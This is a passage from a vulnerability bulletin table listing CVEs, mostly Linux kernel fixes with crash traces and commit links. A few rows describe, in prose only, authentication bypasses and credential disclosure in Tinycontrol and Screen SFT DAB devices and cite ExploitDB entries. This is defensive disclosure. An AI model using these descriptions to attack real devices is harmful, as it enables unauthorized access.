https://git.kernel.org/stable/c/1be16a0c2f10186df505e28b0cc92d7f3366e2a8 https://git.kernel.org/stable/c/5bc0b2fda4b47c86278f7c6d30c211f425bf51cf https://git.kernel.org/stable/c/127b80cefb941a81255c72f11081123f3a705369 https://git.kernel.org/stable/c/cc1538c693d25e282bed8c54b65c914a04023a78 https://git.kernel.org/stable/c/a44e84a9b7764c72896f7241a0ec9ac7e7ef38dd |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: misc: ocxl: fix possible name leak in ocxl_file_register_afu() If device_register() returns an error in ocxl_file_register_afu(), the name allocated by dev_set_name() needs to be freed. As the comment of device_register() says, put_device() should be used to give up the reference in the error path. So fix this by calling put_device(); then the name can be freed in kobject_cleanup(), and info is freed in info_release(). | 2025-12-09 | not yet calculated | CVE-2022-50669 | https://git.kernel.org/stable/c/0cd05062371a49774e8a45258bdedf0bd6d3d327 https://git.kernel.org/stable/c/7525741cb302a1672b8c3a5edb2a08e4229b5c7c https://git.kernel.org/stable/c/3299983a6bf628249ac650908e62d12de959341e https://git.kernel.org/stable/c/557b7de055d1e230ddb6664c29d26917b8db9143 https://git.kernel.org/stable/c/2fce8b3583d1641a1716486f408478b58e96ec91 https://git.kernel.org/stable/c/a4cb1004aeed2ab893a058fad00a5b41a12c4691 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: mmc: omap_hsmmc: fix return value check of mmc_add_host() mmc_add_host() may return an error; if we ignore its return value, it will lead to two issues: 1. The memory allocated in mmc_alloc_host() is leaked. 2. In the remove() path, mmc_remove_host() will be called to delete the device, but it was never added, which leads to a kernel crash because of a null-ptr-deref in device_del(). Fix this by checking the return value and jumping to the error path, which will call mmc_free_host(). | 2025-12-09 | not yet calculated | CVE-2022-50670 | https://git.kernel.org/stable/c/f153c9e15f8961bdf38707853e15b42ea7c691d9 https://git.kernel.org/stable/c/fb3d596267a98813a7a8206097d8d46c98505a0d https://git.kernel.org/stable/c/62005dfcc396424db3337a1dc3ab49623537f5e5 https://git.kernel.org/stable/c/a5f8a4583280a76e50329b910e91ef1dea1e6c79 https://git.kernel.org/stable/c/4e1dc24bcfc8257f24c0663badec7e4f3ae80558 https://git.kernel.org/stable/c/a525cad241c339ca00bf7ebf03c5180f2a9b767c |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: RDMA/rxe: Fix "kernel NULL pointer dereference" error When rxe_queue_init in the function rxe_qp_init_req fails, both qp->req.task.func and qp->req.task.arg are not initialized. Because creation of the qp fails, the function rxe_create_qp will call rxe_qp_do_cleanup to handle the allocated resources. Before calling __rxe_do_task, both qp->req.task.func and qp->req.task.arg should be checked. | 2025-12-09 | not yet calculated | CVE-2022-50671 | https://git.kernel.org/stable/c/48cd7098e71735ccafa0b3cf27c53924f9cb5b2f https://git.kernel.org/stable/c/eca119693010032d6cc6e7e9b4fb2c363c7e12ce https://git.kernel.org/stable/c/9c5dd6993c794703e74c6ba17ac78ca0211ef940 https://git.kernel.org/stable/c/0d773c58d702f0a7c16ee8d69617fd2c28350795 https://git.kernel.org/stable/c/cdce36a88def550773142a34ef727a830cad96a8 https://git.kernel.org/stable/c/f2f405af70e6f0419e718d23fa304798a5405c41 https://git.kernel.org/stable/c/bb33fa65da77f5f02dbee6f25cebaeedfcd70028 https://git.kernel.org/stable/c/3b8752f086eb6865cc3662ad13249b03024501e5 https://git.kernel.org/stable/c/a625ca30eff806395175ebad3ac1399014bdb280 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: mailbox: zynq-ipi: fix error handling while device_register() fails If device_register() fails, there are two issues: 1. The name allocated by dev_set_name() is leaked. 2. The parent of the device is not NULL, so device_unregister() is called in zynqmp_ipi_free_mboxes(), which leads to a kernel crash because of removing a device that was never added. Call put_device() to give up the reference, so the name is freed in kobject_cleanup(). Add a device-registered check in zynqmp_ipi_free_mboxes() to avoid a null-ptr-deref. | 2025-12-09 | not yet calculated | CVE-2022-50672 | https://git.kernel.org/stable/c/b3a5c76f61e2b380e29dfc6705854ca1ee85501d https://git.kernel.org/stable/c/a39b4de0804f9fe0ae911b359ffd4afe7d9d933b https://git.kernel.org/stable/c/4f05d8e2fb3ab702c2633a74571e1b31cb579985 https://git.kernel.org/stable/c/f2d63cefc012cafe1b7651bbf3302f8bcd8bea4a https://git.kernel.org/stable/c/3fcf079958c00d83c51e4f250abf2c77fe9cc1b9 https://git.kernel.org/stable/c/a6792a0cdef0b1c2d77920246283a72537e60e94 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ext4: fix use-after-free in ext4_orphan_cleanup I caught an issue as follows: ================================================================== BUG: KASAN: use-after-free in __list_add_valid+0x28/0x1a0 Read of size 8 at addr ffff88814b13f378 by task mount/710 CPU: 1 PID: 710 Comm: mount Not tainted 6.1.0-rc3-next #370 Call Trace: <TASK> dump_stack_lvl+0x73/0x9f print_report+0x25d/0x759 kasan_report+0xc0/0x120 __asan_load8+0x99/0x140 __list_add_valid+0x28/0x1a0 ext4_orphan_cleanup+0x564/0x9d0 [ext4] __ext4_fill_super+0x48e2/0x5300 [ext4] ext4_fill_super+0x19f/0x3a0 [ext4] get_tree_bdev+0x27b/0x450 ext4_get_tree+0x19/0x30 [ext4] vfs_get_tree+0x49/0x150 path_mount+0xaae/0x1350 do_mount+0xe2/0x110 __x64_sys_mount+0xf0/0x190 do_syscall_64+0x35/0x80 entry_SYSCALL_64_after_hwframe+0x63/0xcd </TASK> [...] ================================================================== The above issue may happen as follows: ------------------------------------- ext4_fill_super ext4_orphan_cleanup --- loop1: assume last_orphan is 12 --- list_add(&EXT4_I(inode)->i_orphan, &EXT4_SB(sb)->s_orphan) ext4_truncate --> return 0 ext4_inode_attach_jinode --> return -ENOMEM iput(inode) --> free inode<12> --- loop2: last_orphan is still 12 --- list_add(&EXT4_I(inode)->i_orphan, &EXT4_SB(sb)->s_orphan); // use inode<12> and trigger UAF To solve this issue, we need to propagate the return value of ext4_inode_attach_jinode() appropriately. | 2025-12-09 | not yet calculated | CVE-2022-50673 | https://git.kernel.org/stable/c/7f801a1593cb957f73659732836b2dafbdfc7709 https://git.kernel.org/stable/c/026a4490b5381229a30f23d073b58e8e35ee6858 https://git.kernel.org/stable/c/7223d5e75f26352354ea2c0ccf8b579821b52adf https://git.kernel.org/stable/c/cf0e0817b0f925b70d101d7014ea81b7094e1159 https://git.kernel.org/stable/c/c2bdbd4c69308835d1b6f6ba74feeccbfe113478 https://git.kernel.org/stable/c/7908b8a541b1578cc61b4da7f19b604a931441da https://git.kernel.org/stable/c/a71248b1accb2b42e4980afef4fa4a27fa0e36f5 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: riscv: vdso: fix NULL dereference in vdso_join_timens() when vfork Testing tools/testing/selftests/timens/vfork_exec.c produced the kernel log below: [ 6.838454] Unable to handle kernel access to user memory without uaccess routines at virtual address 0000000000000020 [ 6.842255] Oops [#1] [ 6.842871] Modules linked in: [ 6.844249] CPU: 1 PID: 64 Comm: vfork_exec Not tainted 6.0.0-rc3-rt15+ #8 [ 6.845861] Hardware name: riscv-virtio,qemu (DT) [ 6.848009] epc : vdso_join_timens+0xd2/0x110 [ 6.850097] ra : vdso_join_timens+0xd2/0x110 [ 6.851164] epc : ffffffff8000635c ra : ffffffff8000635c sp : ff6000000181fbf0 [ 6.852562] gp : ffffffff80cff648 tp : ff60000000fdb700 t0 : 3030303030303030 [ 6.853852] t1 : 0000000000000030 t2 : 3030303030303030 s0 : ff6000000181fc40 [ 6.854984] s1 : ff60000001e6c000 a0 : 0000000000000010 a1 : ffffffff8005654c [ 6.856221] a2 : 00000000ffffefff a3 : 0000000000000000 a4 : 0000000000000000 [ 6.858114] a5 : 0000000000000000 a6 : 0000000000000008 a7 : 0000000000000038 [ 6.859484] s2 : ff60000001e6c068 s3 : ff6000000108abb0 s4 : 0000000000000000 [ 6.860751] s5 : 0000000000001000 s6 : ffffffff8089dc40 s7 : ffffffff8089dc38 [ 6.862029] s8 : ffffffff8089dc30 s9 : ff60000000fdbe38 s10: 000000000000005e [ 6.863304] s11: ffffffff80cc3510 t3 : ffffffff80d1112f t4 : ffffffff80d1112f [ 6.864565] t5 : ffffffff80d11130 t6 : ff6000000181fa00 [ 6.865561] status: 0000000000000120 badaddr: 0000000000000020 cause: 000000000000000d [ 6.868046] [<ffffffff8008dc94>] timens_commit+0x38/0x11a [ 6.869089] [<ffffffff8008dde8>] timens_on_fork+0x72/0xb4 [ 6.870055] [<ffffffff80190096>] begin_new_exec+0x3c6/0x9f0 [ 6.871231] [<ffffffff801d826c>] load_elf_binary+0x628/0x1214 [ 6.872304] [<ffffffff8018ee7a>] bprm_execve+0x1f2/0x4e4 [ 6.873243] [<ffffffff8018f90c>] do_execveat_common+0x16e/0x1ee [ 6.874258] [<ffffffff8018f9c8>] sys_execve+0x3c/0x48 [ 6.875162] [<ffffffff80003556>] ret_from_syscall+0x0/0x2 [ 6.877484] ---[ end trace 0000000000000000 ]--- This is because mm->context.vdso_info is NULL in the vfork case. From another side, mm->context.vdso_info either points to the vdso info for RV64 or the vdso info for compat; there's no need to bloat riscv's mm_context_t, we can handle the difference when setting up the additional page for the vdso. | 2025-12-09 | not yet calculated | CVE-2022-50674 | https://git.kernel.org/stable/c/df30c4feba51beeb138f3518c2421abc8cbda3c1 https://git.kernel.org/stable/c/f2419a6fbb4caf8cf3fe0ac7e4cf2e28127d04b4 https://git.kernel.org/stable/c/a8616d2dc193b6becc36b5f3cfeaa9ac7a5762f9 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: arm64: mte: Avoid setting PG_mte_tagged if no tags cleared or restored Prior to commit 69e3b846d8a7 ("arm64: mte: Sync tags for pages where PTE is untagged"), mte_sync_tags() was only called for pte_tagged() entries (those mapped with PROT_MTE). Therefore mte_sync_tags() could safely use test_and_set_bit(PG_mte_tagged, &page->flags) without inadvertently setting PG_mte_tagged on an untagged page. The above commit was required as guests may enable MTE without any control at the stage 2 mapping, nor a PROT_MTE mapping in the VMM. However, the side-effect was that any page with a PTE that looked like swap (or migration) was getting PG_mte_tagged set automatically. A subsequent page copy (e.g. migration) copied the tags to the destination page even if the tags were owned by KASAN. This issue was masked by the page_kasan_tag_reset() call introduced in commit e5b8d9218951 ("arm64: mte: reset the page tag in page->flags"). When this commit was reverted (20794545c146), KASAN started reporting access faults because the overriding tags in a page did not match the original page->flags (with CONFIG_KASAN_HW_TAGS=y): BUG: KASAN: invalid-access in copy_page+0x10/0xd0 arch/arm64/lib/copy_page.S:26 Read at addr f5ff000017f2e000 by task syz-executor.1/2218 Pointer tag: [f5], memory tag: [f2] Move the PG_mte_tagged bit setting from mte_sync_tags() to the actual place where tags are cleared (mte_sync_page_tags()) or restored (mte_restore_tags()). | 2025-12-09 | not yet calculated | CVE-2022-50675 | https://git.kernel.org/stable/c/918002bdbe4328c8c0164a22e8ebf2384b80dc23 https://git.kernel.org/stable/c/749e9fc18b1e1a3f93a9512e91bd7f93002d2821 https://git.kernel.org/stable/c/a8e5e5146ad08d794c58252bab00b261045ef16d |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net: rds: don't hold sock lock when cancelling work from rds_tcp_reset_callbacks() syzbot is reporting lockdep warning at rds_tcp_reset_callbacks() [1], for commit ac3615e7f3cffe2a ("RDS: TCP: Reduce code duplication in rds_tcp_reset_callbacks()") added cancel_delayed_work_sync() into a section protected by lock_sock() without realizing that rds_send_xmit() might call lock_sock(). We don't need to protect cancel_delayed_work_sync() using lock_sock(), for even if rds_{send,recv}_worker() re-queued this work while __flush_work() from cancel_delayed_work_sync() was waiting for this work to complete, retried rds_{send,recv}_worker() is no-op due to the absence of RDS_CONN_UP bit. | 2025-12-09 | not yet calculated | CVE-2022-50676 | https://git.kernel.org/stable/c/5d2ba255e93211e541373469dffbda7c99dfa0e5 https://git.kernel.org/stable/c/2425007c0967a7c04b0dee7cce05ecf0ca869ad1 https://git.kernel.org/stable/c/e3cb25d3ad08f5dbd53ce2b31720cad529944322 https://git.kernel.org/stable/c/360aa7219285fac63dab99706a16f2daf3222abe https://git.kernel.org/stable/c/da349221c4d2d4ac5f606c1c3b36d4ef0b3e6a0c https://git.kernel.org/stable/c/30bfa5aa7228eb1e67663d67e553627e572cc717 https://git.kernel.org/stable/c/c380c28ab9b15fc53565909c814f6dd3e7f77c4b https://git.kernel.org/stable/c/afe7053c390fe8ff27d0c2ceaece5625283044ba https://git.kernel.org/stable/c/a91b750fd6629354460282bbf5146c01b05c4859 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ipmi: fix use after free in _ipmi_destroy_user() The intf_free() function frees the "intf" pointer so we cannot dereference it again on the next line. | 2025-12-09 | not yet calculated | CVE-2022-50677 | https://git.kernel.org/stable/c/35ad87bfe330f7ef6a19f772223c63296d643172 https://git.kernel.org/stable/c/d23006f2a56e11a3103de0ca8b843bf7fd7d76fc https://git.kernel.org/stable/c/f29d127b372e1b7662397d92341d9f7de198ff99 https://git.kernel.org/stable/c/bfce073089cb81482521c65061835aaa6d1a6cc0 https://git.kernel.org/stable/c/f7fde441198a9ecb130c3ccec91ee2131d6998ee https://git.kernel.org/stable/c/1fc9b20a7688000fcf4d7fbaa58e415a3cdda961 https://git.kernel.org/stable/c/a92ce570c81dc0feaeb12a429b4bc65686d17967 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: wifi: brcmfmac: fix invalid address access when enabling SCAN log level The variable i is changed when setting random MAC address and causes invalid address access when printing the value of pi->reqs[i]->reqid. We replace reqs index with ri to fix the issue. [ 136.726473] Unable to handle kernel access to user memory outside uaccess routines at virtual address 0000000000000000 [ 136.737365] Mem abort info: [ 136.740172] ESR = 0x96000004 [ 136.743359] Exception class = DABT (current EL), IL = 32 bits [ 136.749294] SET = 0, FnV = 0 [ 136.752481] EA = 0, S1PTW = 0 [ 136.755635] Data abort info: [ 136.758514] ISV = 0, ISS = 0x00000004 [ 136.762487] CM = 0, WnR = 0 [ 136.765522] user pgtable: 4k pages, 48-bit VAs, pgdp = 000000005c4e2577 [ 136.772265] [0000000000000000] pgd=0000000000000000 [ 136.777160] Internal error: Oops: 96000004 [#1] PREEMPT SMP [ 136.782732] Modules linked in: brcmfmac(O) brcmutil(O) cfg80211(O) compat(O) [ 136.789788] Process wificond (pid: 3175, stack limit = 0x00000000053048fb) [ 136.796664] CPU: 3 PID: 3175 Comm: wificond Tainted: G O 4.19.42-00001-g531a5f5 #1 [ 136.805532] Hardware name: Freescale i.MX8MQ EVK (DT) [ 136.810584] pstate: 60400005 (nZCv daif +PAN -UAO) [ 136.815429] pc : brcmf_pno_config_sched_scans+0x6cc/0xa80 [brcmfmac] [ 136.821811] lr : brcmf_pno_config_sched_scans+0x67c/0xa80 [brcmfmac] [ 136.828162] sp : ffff00000e9a3880 [ 136.831475] x29: ffff00000e9a3890 x28: ffff800020543400 [ 136.836786] x27: ffff8000b1008880 x26: ffff0000012bf6a0 [ 136.842098] x25: ffff80002054345c x24: ffff800088d22400 [ 136.847409] x23: ffff0000012bf638 x22: ffff0000012bf6d8 [ 136.852721] x21: ffff8000aced8fc0 x20: ffff8000ac164400 [ 136.858032] x19: ffff00000e9a3946 x18: 0000000000000000 [ 136.863343] x17: 0000000000000000 x16: 0000000000000000 [ 136.868655] x15: ffff0000093f3b37 x14: 0000000000000050 [ 136.873966] x13: 0000000000003135 x12: 0000000000000000 [ 136.879277] x11: 0000000000000000 x10: ffff000009a61888 [ 136.884589] x9 : 000000000000000f x8 : 0000000000000008 [ 136.889900] x7 : 303a32303d726464 x6 : ffff00000a1f957d [ 136.895211] x5 : 0000000000000000 x4 : ffff00000e9a3942 [ 136.900523] x3 : 0000000000000000 x2 : ffff0000012cead8 [ 136.905834] x1 : ffff0000012bf6d8 x0 : 0000000000000000 [ 136.911146] Call trace: [ 136.913623] brcmf_pno_config_sched_scans+0x6cc/0xa80 [brcmfmac] [ 136.919658] brcmf_pno_start_sched_scan+0xa4/0x118 [brcmfmac] [ 136.925430] brcmf_cfg80211_sched_scan_start+0x80/0xe0 [brcmfmac] [ 136.931636] nl80211_start_sched_scan+0x140/0x308 [cfg80211] [ 136.937298] genl_rcv_msg+0x358/0x3f4 [ 136.940960] netlink_rcv_skb+0xb4/0x118 [ 136.944795] genl_rcv+0x34/0x48 [ 136.947935] netlink_unicast+0x264/0x300 [ 136.951856] netlink_sendmsg+0x2e4/0x33c [ 136.955781] __sys_sendto+0x120/0x19c | 2025-12-09 | not yet calculated | CVE-2022-50678 | https://git.kernel.org/stable/c/7ccb0529446ae68a8581916bfc95c353306d76ba https://git.kernel.org/stable/c/1c12d47a9017a7745585b57b9b0fdc0d8c50978e https://git.kernel.org/stable/c/56a0ac48634155d2b866b99fba7e1dd8df4e2804 https://git.kernel.org/stable/c/50e45034c5802cedbf5b707364ea76ace29ad984 https://git.kernel.org/stable/c/75995ce1c926ee87bf93d58977c766b4e7744715 https://git.kernel.org/stable/c/4d4dcfa6b4e85a878401f4fbae4cafc88cdcceb4 https://git.kernel.org/stable/c/826405a911473b6ee8bd2aa891cb2f03a13efa17 https://git.kernel.org/stable/c/aa666b68e73fc06d83c070d96180b9010cf5a960 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: i40e: Fix DMA mappings leak During reallocation of RX buffers, new DMA mappings are created for those buffers. steps for reproduction: while : do for ((i=0; i<=8160; i=i+32)) do ethtool -G enp130s0f0 rx $i tx $i sleep 0.5 ethtool -g enp130s0f0 done done This resulted in crash: i40e 0000:01:00.1: Unable to allocate memory for the Rx descriptor ring, size=65536 Driver BUG WARNING: CPU: 0 PID: 4300 at net/core/xdp.c:141 xdp_rxq_info_unreg+0x43/0x50 Call Trace: i40e_free_rx_resources+0x70/0x80 [i40e] i40e_set_ringparam+0x27c/0x800 [i40e] ethnl_set_rings+0x1b2/0x290 genl_family_rcv_msg_doit.isra.15+0x10f/0x150 genl_family_rcv_msg+0xb3/0x160 ? rings_fill_reply+0x1a0/0x1a0 genl_rcv_msg+0x47/0x90 ? genl_family_rcv_msg+0x160/0x160 netlink_rcv_skb+0x4c/0x120 genl_rcv+0x24/0x40 netlink_unicast+0x196/0x230 netlink_sendmsg+0x204/0x3d0 sock_sendmsg+0x4c/0x50 __sys_sendto+0xee/0x160 ? handle_mm_fault+0xbe/0x1e0 ? syscall_trace_enter+0x1d3/0x2c0 __x64_sys_sendto+0x24/0x30 do_syscall_64+0x5b/0x1a0 entry_SYSCALL_64_after_hwframe+0x65/0xca RIP: 0033:0x7f5eac8b035b Missing register, driver bug WARNING: CPU: 0 PID: 4300 at net/core/xdp.c:119 xdp_rxq_info_unreg_mem_model+0x69/0x140 Call Trace: xdp_rxq_info_unreg+0x1e/0x50 i40e_free_rx_resources+0x70/0x80 [i40e] i40e_set_ringparam+0x27c/0x800 [i40e] ethnl_set_rings+0x1b2/0x290 genl_family_rcv_msg_doit.isra.15+0x10f/0x150 genl_family_rcv_msg+0xb3/0x160 ? rings_fill_reply+0x1a0/0x1a0 genl_rcv_msg+0x47/0x90 ? genl_family_rcv_msg+0x160/0x160 netlink_rcv_skb+0x4c/0x120 genl_rcv+0x24/0x40 netlink_unicast+0x196/0x230 netlink_sendmsg+0x204/0x3d0 sock_sendmsg+0x4c/0x50 __sys_sendto+0xee/0x160 ? handle_mm_fault+0xbe/0x1e0 ? syscall_trace_enter+0x1d3/0x2c0 __x64_sys_sendto+0x24/0x30 do_syscall_64+0x5b/0x1a0 entry_SYSCALL_64_after_hwframe+0x65/0xca RIP: 0033:0x7f5eac8b035b This was caused because of new buffers with different RX ring count should substitute older ones, but those buffers were freed in i40e_configure_rx_ring and reallocated again with i40e_alloc_rx_bi, thus kfree on rx_bi caused leak of already mapped DMA. Fix this by reallocating ZC with rx_bi_zc struct when BPF program loads. Additionally reallocate back to rx_bi when BPF program unloads. If BPF program is loaded/unloaded and XSK pools are created, reallocate RX queues accordingly in XSP_SETUP_XSK_POOL handler. | 2025-12-09 | not yet calculated | CVE-2022-50679 | https://git.kernel.org/stable/c/ed5baf3d0a33caaca4cd4073ebb0854cc77a616d https://git.kernel.org/stable/c/94a171c982b8a8137a00721c1e62bc2713435bca https://git.kernel.org/stable/c/5f499596dfa3db9b3172645b6de9e1096a669c95 https://git.kernel.org/stable/c/aae425efdfd1b1d8452260a3cb49344ebf20b1f5 |
| n/a--Malwarebytes 1.0.14 | Malwarebytes 1.0.14 for Linux doesn't properly compute signatures in some scenarios. This allows a bypass of detection. | 2025-12-12 | not yet calculated | CVE-2023-29144 | https://malwarebytes.com https://www.malwarebytes.com/secure/cves/cve-2023-29144 |
| Tinycontrol--Tinycontrol LAN Controller v | Tinycontrol LAN Controller v3 LK3 version 1.58a contains an unauthenticated vulnerability that allows remote attackers to download configuration backup files containing sensitive credentials. Attackers can retrieve the lk3_settings.bin file and extract base64-encoded user and admin passwords without authentication. | 2025-12-09 | not yet calculated | CVE-2023-53739 | ExploitDB-51731 Tinycontrol Product Homepage Zero Science Lab Advisory ID VulnCheck Advisory: Tinycontrol LAN Controller v3 LK3 1.58a Unauthenticated Configuration Backup Disclosure |
| DB Elettronica Telecomunicazioni SpA--Screen SFT DAB Series - Compact Radio DAB Transmitter | Screen SFT DAB 1.9.3 contains an authentication bypass vulnerability that allows attackers to change the admin password without providing the current credentials. Attackers can exploit the userManager.cgx endpoint by sending a crafted JSON request with a new MD5-hashed password to directly modify the admin account. | 2025-12-10 | not yet calculated | CVE-2023-53740 | ExploitDB-51458 Product Homepage Official Product Homepage Vendor Homepage Advisory URL VulnCheck Advisory: Screen SFT DAB 1.9.3 Authentication Bypass via Admin Password Change |
| DB Elettronica Telecomunicazioni SpA--Screen SFT DAB Series - Compact Radio DAB Transmitter | Screen SFT DAB 1.9.3 contains a weak session management vulnerability that allows attackers to bypass authentication controls by reusing IP address-bound session identifiers. Attackers can exploit the vulnerable API by intercepting and reusing established sessions to remove user accounts without proper authorization. | 2025-12-10 | not yet calculated | CVE-2023-53741 | ExploitDB-51457 Product Homepage Official Product Homepage Vendor Homepage Vendor Security Advisory for ZSL-2023-5773 VulnCheck Advisory: Screen SFT DAB 1.9.3 Authentication Bypass via IP Session Management |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: kcsan: Avoid READ_ONCE() in read_instrumented_memory() Haibo Li reported: | Unable to handle kernel paging request at virtual address | ffffff802a0d8d7171 | Mem abort info:o: | ESR = 0x9600002121 | EC = 0x25: DABT (current EL), IL = 32 bitsts | SET = 0, FnV = 0 0 | EA = 0, S1PTW = 0 0 | FSC = 0x21: alignment fault | Data abort info:o: | ISV = 0, ISS = 0x0000002121 | CM = 0, WnR = 0 0 | swapper pgtable: 4k pages, 39-bit VAs, pgdp=000000002835200000 | [ffffff802a0d8d71] pgd=180000005fbf9003, p4d=180000005fbf9003, | pud=180000005fbf9003, pmd=180000005fbe8003, pte=006800002a0d8707 | Internal error: Oops: 96000021 [#1] PREEMPT SMP | Modules linked in: | CPU: 2 PID: 45 Comm: kworker/u8:2 Not tainted | 5.15.78-android13-8-g63561175bbda-dirty #1 | ... | pc : kcsan_setup_watchpoint+0x26c/0x6bc | lr : kcsan_setup_watchpoint+0x88/0x6bc | sp : ffffffc00ab4b7f0 | x29: ffffffc00ab4b800 x28: ffffff80294fe588 x27: 0000000000000001 | x26: 0000000000000019 x25: 0000000000000001 x24: ffffff80294fdb80 | x23: 0000000000000000 x22: ffffffc00a70fb68 x21: ffffff802a0d8d71 | x20: 0000000000000002 x19: 0000000000000000 x18: ffffffc00a9bd060 | x17: 0000000000000001 x16: 0000000000000000 x15: ffffffc00a59f000 | x14: 0000000000000001 x13: 0000000000000000 x12: ffffffc00a70faa0 | x11: 00000000aaaaaaab x10: 0000000000000054 x9 : ffffffc00839adf8 | x8 : ffffffc009b4cf00 x7 : 0000000000000000 x6 : 0000000000000007 | x5 : 0000000000000000 x4 : 0000000000000000 x3 : ffffffc00a70fb70 | x2 : 0005ff802a0d8d71 x1 : 0000000000000000 x0 : 0000000000000000 | Call trace: | kcsan_setup_watchpoint+0x26c/0x6bc | __tsan_read2+0x1f0/0x234 | inflate_fast+0x498/0x750 | zlib_inflate+0x1304/0x2384 | __gunzip+0x3a0/0x45c | gunzip+0x20/0x30 | unpack_to_rootfs+0x2a8/0x3fc | do_populate_rootfs+0xe8/0x11c | async_run_entry_fn+0x58/0x1bc | process_one_work+0x3ec/0x738 | worker_thread+0x4c4/0x838 | kthread+0x20c/0x258 | ret_from_fork+0x10/0x20 | Code: b8bfc2a8 2a0803f7 14000007 d503249f (78bfc2a8) ) | ---[ end trace 613a943cb0a572b6 ]----- The reason for this is that on certain arm64 configuration since e35123d83ee3 ("arm64: lto: Strengthen READ_ONCE() to acquire when CONFIG_LTO=y"), READ_ONCE() may be promoted to a full atomic acquire instruction which cannot be used on unaligned addresses. Fix it by avoiding READ_ONCE() in read_instrumented_memory(), and simply forcing the compiler to do the required access by casting to the appropriate volatile type. In terms of generated code this currently only affects architectures that do not use the default READ_ONCE() implementation. The only downside is that we are not guaranteed atomicity of the access itself, although on most architectures a plain load up to machine word size should still be atomic (a fact the default READ_ONCE() still relies on itself). | 2025-12-08 | not yet calculated | CVE-2023-53742 | https://git.kernel.org/stable/c/706ae665747b629bcf87a2d7e6438602f904b8d5 https://git.kernel.org/stable/c/75c03a8cfc731519236f08c34c7e029ae153a613 https://git.kernel.org/stable/c/f8f2297355513e5e0631e604ef9d7e449c7dcd00 https://git.kernel.org/stable/c/8dec88070d964bfeb4198f34cb5956d89dd1f557 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: PCI: Free released resource after coalescing release_resource() doesn't actually free the resource or resource list entry so free the resource list entry to avoid a leak. | 2025-12-08 | not yet calculated | CVE-2023-53743 | https://git.kernel.org/stable/c/4443f3695d581ad1a55f2ef59259dcd0c52402b3 https://git.kernel.org/stable/c/a076e73dd6e619729e1af8d0d802fe52ac5eb2b3 https://git.kernel.org/stable/c/a08713b9d9031683b83b3ecf12bad40a1ca35211 https://git.kernel.org/stable/c/8ec9c1d5d0a5a4744516adb483b97a238892f9d5 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: soc: ti: pm33xx: Fix refcount leak in am33xx_pm_probe wkup_m3_ipc_get() takes refcount, which should be freed by wkup_m3_ipc_put(). Add missing refcount release in the error paths. | 2025-12-08 | not yet calculated | CVE-2023-53744 | https://git.kernel.org/stable/c/08310f810975c8c9e17c6ffb99fdb76a84e8adb7 https://git.kernel.org/stable/c/6a50350033e0e0854acf59a8413913b4de04bd7d https://git.kernel.org/stable/c/6dbcc493a18dd60947c2168a39df0ec2fe7b5110 https://git.kernel.org/stable/c/e6c6b40c9bf49ce9b5493b146bfeb96359937cfa https://git.kernel.org/stable/c/65305e8c0009a1933679dad5c8196060a10f3c8b https://git.kernel.org/stable/c/8f3c307b580a4a6425896007325bddefc36e8d91 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: um: vector: Fix memory leak in vector_config If the return value of the uml_parse_vector_ifspec function is NULL, we should call kfree(params) to prevent a memory leak. | 2025-12-08 | not yet calculated | CVE-2023-53745 | https://git.kernel.org/stable/c/5c49fb5ad01104acc584405572abf6616d45148e https://git.kernel.org/stable/c/6480c3a12755bf85d6738ab60967e89b809c701a https://git.kernel.org/stable/c/f2b9c4544e3bd60f353732291300097b0e8d8454 https://git.kernel.org/stable/c/276a7298af6a801e9a865282605a79303365ec66 https://git.kernel.org/stable/c/c8583b4655aab44a9796b5c4a681ddcc6fe2f0d0 https://git.kernel.org/stable/c/634a9c139cc1362f6a9cc6cbfe442dbb60ff9f3f https://git.kernel.org/stable/c/8f88c73afe481f93d40801596927e8c0047b6d96 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: s390/vfio-ap: fix memory leak in vfio_ap device driver The device release callback function invoked to release the matrix device uses the dev_get_drvdata(device *dev) function to retrieve the pointer to the vfio_matrix_dev object in order to free its storage. The problem is, this object is not stored as drvdata with the device; since the kfree function will accept a NULL pointer, the memory for the vfio_matrix_dev object is never freed. Since the device being released is contained within the vfio_matrix_dev object, the container_of macro will be used to retrieve its pointer. | 2025-12-08 | not yet calculated | CVE-2023-53746 | https://git.kernel.org/stable/c/5195de1d5f66b276683240a896783f7f43c4f664 https://git.kernel.org/stable/c/ee17dea3072dec0bc34399a32fa884e26342e4ea https://git.kernel.org/stable/c/aa2bff25e9bb10c935c7ffe3d5f5975bdccb1749 https://git.kernel.org/stable/c/6a40fda14b4be3e38f03cc42ffd4efbc64fb3e67 https://git.kernel.org/stable/c/7b6a02f5bf15931464c79dfd487c57f76aae3496 https://git.kernel.org/stable/c/8f8cf767589f2131ae5d40f3758429095c701c84 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: vc_screen: reload load of struct vc_data pointer in vcs_write() to avoid UAF After a call to console_unlock() in vcs_write() the vc_data struct can be freed by vc_port_destruct(). Because of that, the struct vc_data pointer must be reloaded in the while loop in vcs_write() after console_lock() to avoid a UAF when vcs_size() is called. Syzkaller reported a UAF in vcs_size(). BUG: KASAN: slab-use-after-free in vcs_size (drivers/tty/vt/vc_screen.c:215) Read of size 4 at addr ffff8880beab89a8 by task repro_vcs_size/4119 Call Trace: <TASK> __asan_report_load4_noabort (mm/kasan/report_generic.c:380) vcs_size (drivers/tty/vt/vc_screen.c:215) vcs_write (drivers/tty/vt/vc_screen.c:664) vfs_write (fs/read_write.c:582 fs/read_write.c:564) ... <TASK> Allocated by task 1213: kmalloc_trace (mm/slab_common.c:1064) vc_allocate (./include/linux/slab.h:559 ./include/linux/slab.h:680 drivers/tty/vt/vt.c:1078 drivers/tty/vt/vt.c:1058) con_install (drivers/tty/vt/vt.c:3334) tty_init_dev 